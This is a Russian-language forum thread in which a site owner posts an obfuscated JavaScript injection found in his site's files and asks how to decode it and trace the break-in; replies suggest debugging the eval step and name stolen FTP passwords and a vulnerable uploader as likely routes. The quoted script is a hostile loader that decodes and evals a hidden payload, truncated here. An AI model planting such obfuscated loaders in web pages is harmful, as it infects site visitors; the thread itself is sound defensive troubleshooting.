У меня появился на сайте такой посторонний код в индекс-файле и в других тоже. Как мне вычислить что это значит. А главное как мне найти откуда у него ростут ноги?

echo " <script type=\"text/javascript\" language=\"javascript\" >  
w=window;aq=\"0\"+\"x\";ff=String;ff=ff.fromCharCode;
try{document[\"\x62ody\"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}
catch(q){vzs=1;}if(!vzs)e=w[\"eval\"];
if(1){f=\"17,5d,6c,65,5a,   ..... далее еще много через запятую и вконце вот так - \"[\"split\"](\",\");}w=f;s=[];for(i=2-2;-i+1308!=0;i+=1)
{j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>";

_____________
Лэт ит би

А что там вычислять? alert поставь в код и смотри чему равны переменные, или firebug-ом.
Вирус это, а как проник - разные пути есть, и ftp тот же и т.д.

_____________
There never was a struggle in the soul of a good man that was not hard

А где алерт ставить? Разве оно не закодировано? А мозилла вообще этот сайт открыть не может(

_____________
Лэт ит би

В мозилле значит ошибка.
Код походу в переменной s. Т.е. перед fafa(s) можно alert попробовать поставить.

_____________
There never was a struggle in the soul of a good man that was not hard

Алерт ставил не выдает максимум выкидывает то что и так видно

_____________
Лэт ит би

вычислить как обычно, чтением логов

Nuzhser
пароли украли от ФТП. Дырявый загрузчик файлов: upload-inj + include-inj, в связке позволил залить шелл-код. Украли доступ к панели управления, украли пароли от MySQL (PMA), украли пароли от админки, взломали почту и спёрли пароли.
Украсть могли у хостеров, у клиента, у программиста через различного рода вирусов.

_____________
Обучаю веб-программированию качественно и не дорого: http://school-php.com
Фрилансер, принимаю заказы: PHP, JS, AS (видео-чаты). Писать в ЛС (Личные сообщения на phpforum).

Не исключаю что подобное могло случиться. Сайт перезалил пароли все поменял.
А что касается дырявого загрузчика то не знаю че делать.

_____________
Лэт ит би